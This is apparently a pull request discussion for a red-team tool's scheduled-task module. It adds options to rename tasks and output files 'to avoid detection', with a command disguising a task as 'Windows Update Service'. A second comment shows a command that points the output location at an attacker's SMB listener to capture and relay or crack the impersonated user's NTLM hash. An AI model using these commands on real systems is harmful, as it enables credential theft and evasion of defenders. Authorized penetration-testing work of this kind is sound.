schtask_as Improvement - Options for custom task, file, and location.

[Kahvi-0]

Added following options to try and avoid detection when using this module:

TASK Set a name for the scheduled task name
FILE Set a name for the command output file
LOCATION Set a location for the command output file

Example:

nxc smb [ip] -u [user] -p [pwd] -M schtask_as -o USER=Administrator CMD="whoami" TASK="Windows Update Service" FILE="update.log" LOCATION="\\Windows\\Tasks\\"

[NeffIsBack]

Thanks for the PR, nice addition!

[Kahvi-0]

I wanted to document this here as well. An unintended side effect of being able to customize the location now is that you can set the location to be an SMB share. Unfortunately this does not allow you to save the output file to the share (at least not with my current changes) but it does allow you to capture an NTLM callback of the impersonated user.

For example, a scenario were commands might get flagged for being in a task, you could put some garbage or something benign that wont get caught and set the location to be your host, capture the hash, and relay / crack.

Example command:

nxc smb [ip] -u [user] -p [pwd] -M schtask_as -o USER=Administrator CMD="." TASK="[task name]" FILE="[file]" LOCATION="\\\\[listener IP]\\[share]\\"

[NeffIsBack]

Thanks for the PR!

Working flawlessly:

Fyi, added os.path.join to be a bit more flexible with the path&filename (i forgot the last backslash for concatenation for example)